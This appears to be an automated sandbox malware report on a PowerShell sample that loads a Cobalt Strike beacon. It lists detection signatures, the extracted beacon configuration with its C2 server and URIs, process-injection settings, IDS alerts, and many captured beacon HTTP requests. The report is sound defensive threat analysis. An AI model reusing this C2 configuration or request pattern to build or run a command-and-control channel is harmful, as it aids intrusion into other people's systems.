Windows Analysis Report
3.ps1

Overview

General Information

Sample name: 3.ps1
Analysis ID: 1562630
MD5: 69c80576e5413dc4d0d60de98439f649
SHA1: 2fe44c3f073e661eb0cd6dd2c5890b067743ea5d
SHA256: 85856010d3e63101c30a3d061dd55c758350030dd9b14794044a479860abb37f
Tags: ps1user-nawhack
Infos:

Detection

CobaltStrike, Metasploit
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected CobaltStrike
Yara detected MetasploitPayload
Yara detected Powershell download and execute
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to detect sleep reduction / modifications
Found suspicious powershell code related to unpacking or dynamic code loading
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Internet Provider seen in connection with other malware
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Communication To Uncommon Destination Ports
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
Cobalt Strike, CobaltStrike Cobalt Strike is a paid penetration testing product that allows an attacker to deploy an agent named 'Beacon' on the victim machine. Beacon includes a wealth of functionality to the attacker, including, but not limited to command execution, key logging, file transfer, SOCKS proxying, privilege escalation, mimikatz, port scanning and lateral movement. Beacon is in-memory/file-less, in that it consists of stageless or multi-stage shellcode that once loaded by exploiting a vulnerability or executing a shellcode loader, will reflectively load itself into the memory of a process without touching the disk. It supports C2 and staging over HTTP, HTTPS, DNS, SMB named pipes as well as forward and reverse TCP; Beacons can be daisy-chained. Cobalt Strike comes with a toolkit for developing shellcode loaders, called Artifact Kit.The Beacon implant has become popular amongst targeted attackers and criminal users as it is well written, stable, and highly customizable.
  • APT 29
  • APT32
  • APT41
  • AQUATIC PANDA
  • Anunak
  • Cobalt
  • Codoso
  • CopyKittens
  • DarkHydrus
  • Earth Baxia
  • FIN6
  • FIN7
  • Leviathan
  • Mustang Panda
  • Shell Crew
  • Stone Panda
  • TianWu
  • UNC1878
  • UNC2452
  • Winnti Umbrella
 https://malpedia.caad.fkie.fraunhofer.de/details/win.cobalt_strike

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: 3.ps1 Avira: detected
Found malware configuration
Source: 00000000.00000002.4114351286.0000022EF1AEF000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: CobaltStrike {"BeaconType": ["HTTP"], "Port": 8080, "SleepTime": 60000, "MaxGetSize": 1048576, "Jitter": 0, "C2Server": "3.78.244.11,/dot.gif", "HttpPostUri": "/submit.php", "Malleable_C2_Instructions": [], "HttpGet_Verb": "GET", "HttpPost_Verb": "POST", "HttpPostChunk": 0, "Spawnto_x86": "%windir%\\syswow64\\rundll32.exe", "Spawnto_x64": "%windir%\\sysnative\\rundll32.exe", "CryptoScheme": 0, "Proxy_Behavior": "Use IE settings", "Watermark": 987654321, "bStageCleanup": "False", "bCFGCaution": "False", "KillDate": 0, "bProcInject_StartRWX": "True", "bProcInject_UseRWX": "True", "bProcInject_MinAllocSize": 0, "ProcInject_PrependAppend_x86": "Empty", "ProcInject_PrependAppend_x64": "Empty", "ProcInject_Execute": ["CreateThread", "SetThreadContext", "CreateRemoteThread", "RtlCreateUserThread"], "ProcInject_AllocationMethod": "VirtualAllocEx", "bUsesCookies": "True", "HostHeader": ""}
Multi AV Scanner detection for submitted file
Source: 3.ps1 ReversingLabs: Detection: 73%
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 92.5% probability
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_0000022EFA0B1184 CryptAcquireContextA,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext, 0_2_0000022EFA0B1184
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_0000022EFA0E2020 CryptGenRandom, 0_2_0000022EFA0E2020
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_0000022EFA0C1C30 malloc,GetCurrentDirectoryA,FindFirstFileA,GetLastError,free,free,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,FindNextFileA,FindClose, 0_2_0000022EFA0C1C30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_0000022EFA0C9220 malloc,_snprintf,FindFirstFileA,free,malloc,_snprintf,free,FindNextFileA,FindClose, 0_2_0000022EFA0C9220

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49731 -> 3.78.244.11:8080
Source: Network traffic Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49730 -> 3.78.244.11:8080
Source: Network traffic Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49738 -> 3.78.244.11:8080
Source: Network traffic Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49739 -> 3.78.244.11:8080
Source: Network traffic Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49816 -> 3.78.244.11:8080
Source: Network traffic Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49864 -> 3.78.244.11:8080
Source: Network traffic Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49915 -> 3.78.244.11:8080
Source: Network traffic Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49963 -> 3.78.244.11:8080
Source: Network traffic Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50011 -> 3.78.244.11:8080
Source: Network traffic Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49767 -> 3.78.244.11:8080
Source: Network traffic Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50012 -> 3.78.244.11:8080
Source: Network traffic Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50013 -> 3.78.244.11:8080
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: 3.78.244.11
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.4:49730 -> 3.78.244.11:8080
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: AMAZON-02US AMAZON-02US
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: f757jzSoq0sKQ3fJ6KZmji18Q4ILsd26Gs7NrAj2OqsVVHu2Mmk+klzXHpGIocQZmk6FOZ8/+LaMILyJw2B3YcqbA13cv5YKyeS0Ax1UIPwuT3i/j9xdfYOMpIcp0FV6jdwC7/LKBDN2RLSKy+3jSaHwRduSBiQHuQTdwNqMpAw=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Host: 3.78.244.11:8080Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: f757jzSoq0sKQ3fJ6KZmji18Q4ILsd26Gs7NrAj2OqsVVHu2Mmk+klzXHpGIocQZmk6FOZ8/+LaMILyJw2B3YcqbA13cv5YKyeS0Ax1UIPwuT3i/j9xdfYOMpIcp0FV6jdwC7/LKBDN2RLSKy+3jSaHwRduSBiQHuQTdwNqMpAw=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Host: 3.78.244.11:8080Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: f757jzSoq0sKQ3fJ6KZmji18Q4ILsd26Gs7NrAj2OqsVVHu2Mmk+klzXHpGIocQZmk6FOZ8/+LaMILyJw2B3YcqbA13cv5YKyeS0Ax1UIPwuT3i/j9xdfYOMpIcp0FV6jdwC7/LKBDN2RLSKy+3jSaHwRduSBiQHuQTdwNqMpAw=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Host: 3.78.244.11:8080Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: f757jzSoq0sKQ3fJ6KZmji18Q4ILsd26Gs7NrAj2OqsVVHu2Mmk+klzXHpGIocQZmk6FOZ8/+LaMILyJw2B3YcqbA13cv5YKyeS0Ax1UIPwuT3i/j9xdfYOMpIcp0FV6jdwC7/LKBDN2RLSKy+3jSaHwRduSBiQHuQTdwNqMpAw=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Host: 3.78.244.11:8080Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: f757jzSoq0sKQ3fJ6KZmji18Q4ILsd26Gs7NrAj2OqsVVHu2Mmk+klzXHpGIocQZmk6FOZ8/+LaMILyJw2B3YcqbA13cv5YKyeS0Ax1UIPwuT3i/j9xdfYOMpIcp0FV6jdwC7/LKBDN2RLSKy+3jSaHwRduSBiQHuQTdwNqMpAw=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Host: 3.78.244.11:8080Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: f757jzSoq0sKQ3fJ6KZmji18Q4ILsd26Gs7NrAj2OqsVVHu2Mmk+klzXHpGIocQZmk6FOZ8/+LaMILyJw2B3YcqbA13cv5YKyeS0Ax1UIPwuT3i/j9xdfYOMpIcp0FV6jdwC7/LKBDN2RLSKy+3jSaHwRduSBiQHuQTdwNqMpAw=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Host: 3.78.244.11:8080Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: f757jzSoq0sKQ3fJ6KZmji18Q4ILsd26Gs7NrAj2OqsVVHu2Mmk+klzXHpGIocQZmk6FOZ8/+LaMILyJw2B3YcqbA13cv5YKyeS0Ax1UIPwuT3i/j9xdfYOMpIcp0FV6jdwC7/LKBDN2RLSKy+3jSaHwRduSBiQHuQTdwNqMpAw=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Host: 3.78.244.11:8080Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: f757jzSoq0sKQ3fJ6KZmji18Q4ILsd26Gs7NrAj2OqsVVHu2Mmk+klzXHpGIocQZmk6FOZ8/+LaMILyJw2B3YcqbA13cv5YKyeS0Ax1UIPwuT3i/j9xdfYOMpIcp0FV6jdwC7/LKBDN2RLSKy+3jSaHwRduSBiQHuQTdwNqMpAw=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Host: 3.78.244.11:8080Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: f757jzSoq0sKQ3fJ6KZmji18Q4ILsd26Gs7NrAj2OqsVVHu2Mmk+klzXHpGIocQZmk6FOZ8/+LaMILyJw2B3YcqbA13cv5YKyeS0Ax1UIPwuT3i/j9xdfYOMpIcp0FV6jdwC7/LKBDN2RLSKy+3jSaHwRduSBiQHuQTdwNqMpAw=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Host: 3.78.244.11:8080Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: f757jzSoq0sKQ3fJ6KZmji18Q4ILsd26Gs7NrAj2OqsVVHu2Mmk+klzXHpGIocQZmk6FOZ8/+LaMILyJw2B3YcqbA13cv5YKyeS0Ax1UIPwuT3i/j9xdfYOMpIcp0FV6jdwC7/LKBDN2RLSKy+3jSaHwRduSBiQHuQTdwNqMpAw=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Host: 3.78.244.11:8080Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: f757jzSoq0sKQ3fJ6KZmji18Q4ILsd26Gs7NrAj2OqsVVHu2Mmk+klzXHpGIocQZmk6FOZ8/+LaMILyJw2B3YcqbA13cv5YKyeS0Ax1UIPwuT3i/j9xdfYOMpIcp0FV6jdwC7/LKBDN2RLSKy+3jSaHwRduSBiQHuQTdwNqMpAw=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Host: 3.78.244.11:8080Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: f757jzSoq0sKQ3fJ6KZmji18Q4ILsd26Gs7NrAj2OqsVVHu2Mmk+klzXHpGIocQZmk6FOZ8/+LaMILyJw2B3YcqbA13cv5YKyeS0Ax1UIPwuT3i/j9xdfYOMpIcp0FV6jdwC7/LKBDN2RLSKy+3jSaHwRduSBiQHuQTdwNqMpAw=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Host: 3.78.244.11:8080Connection: Keep-AliveCache-Control: no-cache
Source: unknown TCP traffic detected without corresponding DNS query: 3.78.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 3.78.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 3.78.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 3.78.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 3.78.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 3.78.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 3.78.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 3.78.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 3.78.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 3.78.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 3.78.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 3.78.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 3.78.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 3.78.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 3.78.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 3.78.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 3.78.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 3.78.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 3.78.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 3.78.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 3.78.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 3.78.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 3.78.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 3.78.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 3.78.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 3.78.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 3.78.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 3.78.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 3.78.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 3.78.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 3.78.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 3.78.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 3.78.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 3.78.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 3.78.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 3.78.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 3.78.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 3.78.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 3.78.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 3.78.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 3.78.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 3.78.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 3.78.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 3.78.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 3.78.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 3.78.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 3.78.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 3.78.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 3.78.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 3.78.244.11
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_0000022EFA0BE68C _snprintf,_snprintf,_snprintf,HttpOpenRequestA,HttpSendRequestA,InternetQueryDataAvailable,InternetCloseHandle,InternetReadFile,InternetCloseHandle, 0_2_0000022EFA0BE68C
Source: global traffic HTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: f757jzSoq0sKQ3fJ6KZmji18Q4ILsd26Gs7NrAj2OqsVVHu2Mmk+klzXHpGIocQZmk6FOZ8/+LaMILyJw2B3YcqbA13cv5YKyeS0Ax1UIPwuT3i/j9xdfYOMpIcp0FV6jdwC7/LKBDN2RLSKy+3jSaHwRduSBiQHuQTdwNqMpAw=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Host: 3.78.244.11:8080Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: f757jzSoq0sKQ3fJ6KZmji18Q4ILsd26Gs7NrAj2OqsVVHu2Mmk+klzXHpGIocQZmk6FOZ8/+LaMILyJw2B3YcqbA13cv5YKyeS0Ax1UIPwuT3i/j9xdfYOMpIcp0FV6jdwC7/LKBDN2RLSKy+3jSaHwRduSBiQHuQTdwNqMpAw=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Host: 3.78.244.11:8080Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: f757jzSoq0sKQ3fJ6KZmji18Q4ILsd26Gs7NrAj2OqsVVHu2Mmk+klzXHpGIocQZmk6FOZ8/+LaMILyJw2B3YcqbA13cv5YKyeS0Ax1UIPwuT3i/j9xdfYOMpIcp0FV6jdwC7/LKBDN2RLSKy+3jSaHwRduSBiQHuQTdwNqMpAw=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Host: 3.78.244.11:8080Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: f757jzSoq0sKQ3fJ6KZmji18Q4ILsd26Gs7NrAj2OqsVVHu2Mmk+klzXHpGIocQZmk6FOZ8/+LaMILyJw2B3YcqbA13cv5YKyeS0Ax1UIPwuT3i/j9xdfYOMpIcp0FV6jdwC7/LKBDN2RLSKy+3jSaHwRduSBiQHuQTdwNqMpAw=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Host: 3.78.244.11:8080Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: f757jzSoq0sKQ3fJ6KZmji18Q4ILsd26Gs7NrAj2OqsVVHu2Mmk+klzXHpGIocQZmk6FOZ8/+LaMILyJw2B3YcqbA13cv5YKyeS0Ax1UIPwuT3i/j9xdfYOMpIcp0FV6jdwC7/LKBDN2RLSKy+3jSaHwRduSBiQHuQTdwNqMpAw=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Host: 3.78.244.11:8080Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: f757jzSoq0sKQ3fJ6KZmji18Q4ILsd26Gs7NrAj2OqsVVHu2Mmk+klzXHpGIocQZmk6FOZ8/+LaMILyJw2B3YcqbA13cv5YKyeS0Ax1UIPwuT3i/j9xdfYOMpIcp0FV6jdwC7/LKBDN2RLSKy+3jSaHwRduSBiQHuQTdwNqMpAw=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Host: 3.78.244.11:8080Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: f757jzSoq0sKQ3fJ6KZmji18Q4ILsd26Gs7NrAj2OqsVVHu2Mmk+klzXHpGIocQZmk6FOZ8/+LaMILyJw2B3YcqbA13cv5YKyeS0Ax1UIPwuT3i/j9xdfYOMpIcp0FV6jdwC7/LKBDN2RLSKy+3jSaHwRduSBiQHuQTdwNqMpAw=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Host: 3.78.244.11:8080Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: f757jzSoq0sKQ3fJ6KZmji18Q4ILsd26Gs7NrAj2OqsVVHu2Mmk+klzXHpGIocQZmk6FOZ8/+LaMILyJw2B3YcqbA13cv5YKyeS0Ax1UIPwuT3i/j9xdfYOMpIcp0FV6jdwC7/LKBDN2RLSKy+3jSaHwRduSBiQHuQTdwNqMpAw=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Host: 3.78.244.11:8080Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: f757jzSoq0sKQ3fJ6KZmji18Q4ILsd26Gs7NrAj2OqsVVHu2Mmk+klzXHpGIocQZmk6FOZ8/+LaMILyJw2B3YcqbA13cv5YKyeS0Ax1UIPwuT3i/j9xdfYOMpIcp0FV6jdwC7/LKBDN2RLSKy+3jSaHwRduSBiQHuQTdwNqMpAw=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Host: 3.78.244.11:8080Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: f757jzSoq0sKQ3fJ6KZmji18Q4ILsd26Gs7NrAj2OqsVVHu2Mmk+klzXHpGIocQZmk6FOZ8/+LaMILyJw2B3YcqbA13cv5YKyeS0Ax1UIPwuT3i/j9xdfYOMpIcp0FV6jdwC7/LKBDN2RLSKy+3jSaHwRduSBiQHuQTdwNqMpAw=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Host: 3.78.244.11:8080Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: f757jzSoq0sKQ3fJ6KZmji18Q4ILsd26Gs7NrAj2OqsVVHu2Mmk+klzXHpGIocQZmk6FOZ8/+LaMILyJw2B3YcqbA13cv5YKyeS0Ax1UIPwuT3i/j9xdfYOMpIcp0FV6jdwC7/LKBDN2RLSKy+3jSaHwRduSBiQHuQTdwNqMpAw=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Host: 3.78.244.11:8080Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: f757jzSoq0sKQ3fJ6KZmji18Q4ILsd26Gs7NrAj2OqsVVHu2Mmk+klzXHpGIocQZmk6FOZ8/+LaMILyJw2B3YcqbA13cv5YKyeS0Ax1UIPwuT3i/j9xdfYOMpIcp0FV6jdwC7/LKBDN2RLSKy+3jSaHwRduSBiQHuQTdwNqMpAw=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Host: 3.78.244.11:8080Connection: Keep-AliveCache-Control: no-cache
Source: powershell.exe, 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: http://127.0.0.1:%u/
Source: powershell.exe, 00000000.00000002.4119501587.0000022EF9A86000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://3.78.244.11:8080/dot.gif
Source: powershell.exe, 00000000.00000002.4119501587.0000022EF9A86000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://3.78.244.11:8080/dot.gif1
Source: powershell.exe, 00000000.00000002.4119501587.0000022EF9A86000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://3.78.244.11:8080/dot.gif11:8080/dot.gif
Source: powershell.exe, 00000000.00000002.4119501587.0000022EF9A86000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://3.78.244.11:8080/dot.gif2
Source: powershell.exe, 00000000.00000002.4119501587.0000022EF99F0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://3.78.244.11:8080/dot.gif9.0
Source: powershell.exe, 00000000.00000002.4119501587.0000022EF9A86000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://3.78.244.11:8080/dot.gifD
Source: powershell.exe, 00000000.00000002.4119501587.0000022EF9A86000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://3.78.244.11:8080/dot.gifG
Source: powershell.exe, 00000000.00000002.4119501587.0000022EF99F0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://3.78.244.11:8080/dot.gifPDL
Source: powershell.exe, 00000000.00000002.4121724697.0000022EF9D85000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://3.78.244.11:8080/dot.gifU
Source: powershell.exe, 00000000.00000002.4119501587.0000022EF9A86000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://3.78.244.11:8080/dot.gife
Source: powershell.exe, 00000000.00000002.4119501587.0000022EF9A86000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://3.78.244.11:8080/dot.gifll
Source: powershell.exe, 00000000.00000002.4119501587.0000022EF9A86000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://3.78.244.11:8080/dot.gifllV
Source: powershell.exe, 00000000.00000002.4119501587.0000022EF9A86000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://3.78.244.11:8080/dot.gifystem32
Source: powershell.exe, 00000000.00000002.4119501587.0000022EF9A86000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://3.78.244.11:8080/dot.gif~
Source: powershell.exe, 00000000.00000002.4119501587.0000022EF9A2F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.v
Source: powershell.exe, 00000000.00000002.4098790194.0000022EE2E6B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.4114351286.0000022EF1AEF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000000.00000002.4098790194.0000022EE1B08000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000000.00000002.4098790194.0000022EE18E1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000000.00000002.4098790194.0000022EE1B08000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000000.00000002.4098790194.0000022EE18E1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000000.00000002.4114351286.0000022EF1AEF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000000.00000002.4114351286.0000022EF1AEF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000000.00000002.4114351286.0000022EF1AEF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
